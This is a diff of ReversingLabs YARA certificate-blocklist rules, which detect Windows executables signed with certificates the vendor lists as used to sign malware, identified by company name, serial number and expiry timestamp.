+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4106-L4122"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f10316a26e2d34400b7c2e403eab18ab6c1cc94b35f0ac8a3f490d101d29dc8d"
+		logic_hash = "5a89fec015e56ddddaed75be91a87288dcd27841937d26e3416187913c4f0b85"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20717,21 +43111,21 @@ rule REVERSINGLABS_Cert_Blocklist_12705Fb66Bc22C68372A1C4E5Fa662E2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APRIL BROTHERS LTD" and pe.signatures [ i ] . serial == "12:70:5f:b6:6b:c2:2c:68:37:2a:1c:4e:5f:a6:62:e2" and 1642464000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Programavimo paslaugos, MB" and pe.signatures [ i ] . serial == "29:12:8a:56:e7:b3:bf:b2:30:74:25:91:ac:8b:47:18" and 1590900909 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3B0914E2982Be8980Aa23F49848555E5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Bfbfdfef43608730Ee14779Ee3Ee2Cb : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "88ca65c4-ba0d-5676-979b-4fac737d4f21"
+		id = "fdc2f6a0-8fae-537e-812f-b0c292f76b1e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10144-L10160"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4124-L4140"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ea7d9fa7817751fef775765b54be5dd4d00c15ca50ac10fb40fb46cc3634c7b0"
+		logic_hash = "f8f233b78e9d3558b0cd7978e3c5fa32645a3bb706c6fdec7f1e4195cf513f10"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20741,21 +43135,21 @@ rule REVERSINGLABS_Cert_Blocklist_3B0914E2982Be8980Aa23F49848555E5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Office Rat s.r.o." and pe.signatures [ i ] . serial == "3b:09:14:e2:98:2b:e8:98:0a:a2:3f:49:84:85:55:e5" and 1643155200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CSTech Software Inc." and pe.signatures [ i ] . serial == "7b:fb:fd:fe:f4:36:08:73:0e:e1:47:79:ee:3e:e2:cb" and 1590537600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_029Bf7E1Cb09Fe277564Bd27C267De5A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_62205361A758B00572D417Cba014F007 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1e66d13c-3345-592c-9bf8-b8a566c8b9e6"
+		id = "85da8e0e-d791-5fed-b9ea-c681462651a6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10162-L10178"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4142-L4158"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3f64372d11d61c669580d90cdf2201e7f2904fb3d73d27be2ff1559c9c37614a"
+		logic_hash = "ebf28921c81191bcf6130baf6532122bb320cc916e38ab225f0acdcb57ea00f3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20765,21 +43159,21 @@ rule REVERSINGLABS_Cert_Blocklist_029Bf7E1Cb09Fe277564Bd27C267De5A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAMOYAJ LIMITED" and pe.signatures [ i ] . serial == "02:9b:f7:e1:cb:09:fe:27:75:64:bd:27:c2:67:de:5a" and 1637712001 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UNITEKH-S, OOO" and pe.signatures [ i ] . serial == "62:20:53:61:a7:58:b0:05:72:d4:17:cb:a0:14:f0:07" and 1590470683 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4B47D18Dbea57Abd1563Ddf89F87A6C2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6da50886-7f15-5565-9a1a-f6fb25a729ac"
+		id = "689c1f80-3b3c-5bd7-9129-4f508cad7fb4"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10180-L10198"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4160-L4176"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3f3f1d5c871d2b73627d4281ac5bcd08799fb47f94155e82795d97c87de35e40"
+		logic_hash = "2e464f4e9bfe0c9510a78552acffb241d2435ea9bf3f5f2501353d7f8f280d78"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20789,21 +43183,21 @@ rule REVERSINGLABS_Cert_Blocklist_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOUSE 9A s.r.o" and ( pe.signatures [ i ] . serial == "00:d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" or pe.signatures [ i ] . serial == "d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" ) and 1640822400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KBK, OOO" and pe.signatures [ i ] . serial == "4b:47:d1:8d:be:a5:7a:bd:15:63:dd:f8:9f:87:a6:c2" and 1590485607 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_734819463C1195Bd6E135Ce4D5Bf49Bc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Be41E2C7Bb2493044B9241Abb732599D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7dd21fa-1501-50b2-bd9c-c33cfd932a6b"
+		id = "81e5a8f3-0893-534a-ab4f-5c2c47078b40"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10200-L10216"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4178-L4196"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a63c05cca23b61ba6eabda2b60c617b966a2669fd3a0da30354792e5c1ae2140"
+		logic_hash = "eb5d94b80fd030d14dc26878895c61761825f3c77209ca0280e88dcd1800f9c2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20813,21 +43207,21 @@ rule REVERSINGLABS_Cert_Blocklist_734819463C1195Bd6E135Ce4D5Bf49Bc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "videoalarm s. r. o." and pe.signatures [ i ] . serial == "73:48:19:46:3c:11:95:bd:6e:13:5c:e4:d5:bf:49:bc" and 1637884800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Company Babylon" and ( pe.signatures [ i ] . serial == "00:be:41:e2:c7:bb:24:93:04:4b:92:41:ab:b7:32:59:9d" or pe.signatures [ i ] . serial == "be:41:e2:c7:bb:24:93:04:4b:92:41:ab:b7:32:59:9d" ) and 1589146251 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Db95B22362D46A73C39E0Ac924883C5B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_15C5Af15Afecf1C900Cbab0Ca9165629 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "527b7963-340e-5d8f-b7e1-1269c0073ec9"
+		id = "de734943-e735-5895-b76e-5f8588a77540"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10218-L10236"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4198-L4214"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "895983bcb7f3a0c5ce54504f4a2ff8d652137434b8951380d756de6556d0844e"
+		logic_hash = "5c54f32dbac271b2b60ec40bd052b5566a512cd2bcb4255057b21262806882d2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20837,21 +43231,21 @@ rule REVERSINGLABS_Cert_Blocklist_Db95B22362D46A73C39E0Ac924883C5B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPSLTD PLYMOUTH LTD" and ( pe.signatures [ i ] . serial == "00:db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" or pe.signatures [ i ] . serial == "db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" ) and 1621296000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kompaniya Auttek" and pe.signatures [ i ] . serial == "15:c5:af:15:af:ec:f1:c9:00:cb:ab:0c:a9:16:56:29" and 1586091840 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0C48732873Ac8Ccebaf8F0E1E8329Cec : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_476De2F108D20B43Ba3Bae6F331Af8F1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b531341a-e8ac-5b56-a202-3c072f5d2ce0"
+		id = "5a741e6d-9b58-5536-8987-b3c36cdfcd5f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10238-L10254"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4216-L4232"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7c9476a4119e013c8bb3c14b607090d592feaa5f2fc0f78d810555681d4a3733"
+		logic_hash = "e5edf3e15b2139ba6cd85f2cfea63b53f7fa36a3fd7224a4a9ccbe5de6eb6f1d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20861,21 +43255,21 @@ rule REVERSINGLABS_Cert_Blocklist_0C48732873Ac8Ccebaf8F0E1E8329Cec : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hermetica Digital Ltd" and pe.signatures [ i ] . serial == "0c:48:73:28:73:ac:8c:ce:ba:f8:f0:e1:e8:32:9c:ec" and 1618272000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digiwill Limited" and pe.signatures [ i ] . serial == "47:6d:e2:f1:08:d2:0b:43:ba:3b:ae:6f:33:1a:f8:f1" and 1588135722 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C51F4Cf4D82Bc920421E1Ad93E39D490 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_08Ddcc67F8Cad6929607E4Cda29B3503 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "727aba82-c908-51a6-9f1f-7fd8df424d8c"
+		id = "3563547f-556b-56e3-ad25-cfec0294fe93"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10256-L10274"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4234-L4250"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cef717e7fe3eb0fb958d405caaf98fa51b22b150ccbf1286d3b4634e9df81ade"
+		logic_hash = "4cd975312ca825b51f34f5c89184a56526877436224c1e7407d715b28ebfd9d5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20885,21 +43279,21 @@ rule REVERSINGLABS_Cert_Blocklist_C51F4Cf4D82Bc920421E1Ad93E39D490 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CUT AHEAD LTD" and ( pe.signatures [ i ] . serial == "00:c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" or pe.signatures [ i ] . serial == "c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" ) and 1644624000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FAN-CHAI, TOV" and pe.signatures [ i ] . serial == "08:dd:cc:67:f8:ca:d6:92:96:07:e4:cd:a2:9b:35:03" and 1564310268 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C96086F1894E6420D2B4Bdeea834C4D7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_052242Ace583Adf2A3B96Adcb04D0812 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1268461b-676c-59b8-80c1-c54dbe1a265f"
+		id = "22104929-e2c5-565c-975c-826f666e78e2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10276-L10294"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4252-L4268"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "949bbd41ad4c83a05c1f004786cd296e2af80a3a559955ec90a4675cdfa04258"
+		logic_hash = "e1593a2bf375912e411d5f19d9e232c6b87f0897bb6f1c0b0539380b34b05af5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20909,21 +43303,21 @@ rule REVERSINGLABS_Cert_Blocklist_C96086F1894E6420D2B4Bdeea834C4D7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE FAITH SP Z O O" and ( pe.signatures [ i ] . serial == "00:c9:60:86:f1:89:4e:64:20:d2:b4:bd:ee:a8:34:c4:d7" or pe.signatures [ i ] . serial == "c9:60:86:f1:89:4e:64:20:d2:b4:bd:ee:a8:34:c4:d7" ) and 1644969600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FAN-CHAI, TOV" and pe.signatures [ i ] . serial == "05:22:42:ac:e5:83:ad:f2:a3:b9:6a:dc:b0:4d:08:12" and 1573603200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_06Fa27A121Cc82230C3013Ee634B6C62 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Bebef5C533Ce92Efc402Fab8605C43Ec : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4520e544-7a41-5dde-b90b-46cf3349297c"
+		id = "59d3dd01-47bc-59ee-8fe7-fd5b1af8f9f4"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10296-L10312"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4270-L4288"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "23ac7a97e7632536ed27cf9078b6bc1a734f1e991a20a228734b45117582f367"
+		logic_hash = "daa57ad622799467c60693060e6c9eea18bdf0bb26f178e8b03453aab486ccf4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20933,21 +43327,21 @@ rule REVERSINGLABS_Cert_Blocklist_06Fa27A121Cc82230C3013Ee634B6C62 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zimmi Consulting Inc" and pe.signatures [ i ] . serial == "06:fa:27:a1:21:cc:82:23:0c:30:13:ee:63:4b:6c:62" and 1645142401 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO VEKTOR" and ( pe.signatures [ i ] . serial == "00:be:be:f5:c5:33:ce:92:ef:c4:02:fa:b8:60:5c:43:ec" or pe.signatures [ i ] . serial == "be:be:f5:c5:33:ce:92:ef:c4:02:fa:b8:60:5c:43:ec" ) and 1587513600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_9Dd3B2F7957Ba99F4B04Fcdbe03B7Aac : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1D3F39F481Fe067F8A9289Bb49E05A04 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "25229478-e891-5e0a-b738-6ca1fdd0012c"
+		id = "0c4b6efb-c793-5505-bcd6-f62266c984c6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10314-L10332"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4290-L4306"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d4f1b75dddd47fe8a19bd8e794b4930bdcaf54d63db57422db0a9b631d4f488d"
+		logic_hash = "2fdf8b59d302d2ce81a1e9a5715138adc1ec45bd86871c4c2e46412407e329f9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20957,21 +43351,21 @@ rule REVERSINGLABS_Cert_Blocklist_9Dd3B2F7957Ba99F4B04Fcdbe03B7Aac : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DOD MEDIA LIMITED" and ( pe.signatures [ i ] . serial == "00:9d:d3:b2:f7:95:7b:a9:9f:4b:04:fc:db:e0:3b:7a:ac" or pe.signatures [ i ] . serial == "9d:d3:b2:f7:95:7b:a9:9f:4b:04:fc:db:e0:3b:7a:ac" ) and 1646438400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LOGIKA, OOO" and pe.signatures [ i ] . serial == "1d:3f:39:f4:81:fe:06:7f:8a:92:89:bb:49:e0:5a:04" and 1592553220 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_061051Ff2A8Afab10347A6F1Ff08Ecb6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7Be35D025E65Cc7A4Ee01F72 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4e23648f-9770-53ad-9c62-6e6239a02aa7"
+		id = "533bcad1-b589-5a05-8f35-32fcb79c7f68"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10334-L10350"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4308-L4324"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "db3ac3ee326c60e9abc94a2fb53d801637f044e7ab72d69e53958799e48747b7"
+		logic_hash = "dad7ab834a67d36c0b63e45922aea566dc0aaf922be2b74161616b3caea83fdc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -20981,21 +43375,21 @@ rule REVERSINGLABS_Cert_Blocklist_061051Ff2A8Afab10347A6F1Ff08Ecb6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TACHOPARTS SP Z O O" and pe.signatures [ i ] . serial == "06:10:51:ff:2a:8a:fa:b1:03:47:a6:f1:ff:08:ec:b6" and 1606435200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logika OOO" and pe.signatures [ i ] . serial == "7b:e3:5d:02:5e:65:cc:7a:4e:e0:1f:72" and 1594976445 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Eda2429083Bfafb04E6E7Bdda1B08834 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_351Fe2Efdc0Ac56A0C822Cf8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0f5852c4-7866-5e12-97e9-c73972def6c5"
+		id = "ac6b7c6d-781b-5c91-80fe-b822ee00ea7f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10352-L10370"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4326-L4342"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4f7d5c6929fe364c8868fddb28dd7bbf7cdcf3896d57836466af1a538190d11c"
+		logic_hash = "46b87c3531e01ba150f056ec3270564426363ef8c58256eeedbcab247c7625e4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21005,21 +43399,21 @@ rule REVERSINGLABS_Cert_Blocklist_Eda2429083Bfafb04E6E7Bdda1B08834 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OWLNET LIMITED" and ( pe.signatures [ i ] . serial == "00:ed:a2:42:90:83:bf:af:b0:4e:6e:7b:dd:a1:b0:88:34" or pe.signatures [ i ] . serial == "ed:a2:42:90:83:bf:af:b0:4e:6e:7b:dd:a1:b0:88:34" ) and 1625011200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logika OOO" and pe.signatures [ i ] . serial == "35:1f:e2:ef:dc:0a:c5:6a:0c:82:2c:f8" and 1594976475 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A590154B5980E566314122987Dea548 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9Cfbb4C69008821Aaacecde97Ee149Ab : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fd2a2165-494b-5655-a322-73f033643c74"
+		id = "a8ba633b-fbbe-51ca-9f67-fb91ce9ac2f7"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10372-L10388"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4344-L4362"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d5fdf2bc61fadf3e73bcf1695c48ebc465e614cdd2310f9e5f40648d9615afc4"
+		logic_hash = "d74b13eeb5d0a57c5dd3257480230c504a68a8422e77a46bb2e101abb2c7f282"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21029,21 +43423,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A590154B5980E566314122987Dea548 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maya logistika d.o.o." and pe.signatures [ i ] . serial == "0a:59:01:54:b5:98:0e:56:63:14:12:29:87:de:a5:48" and 1636416000 <= pe.signatures [ i ] . not_after )
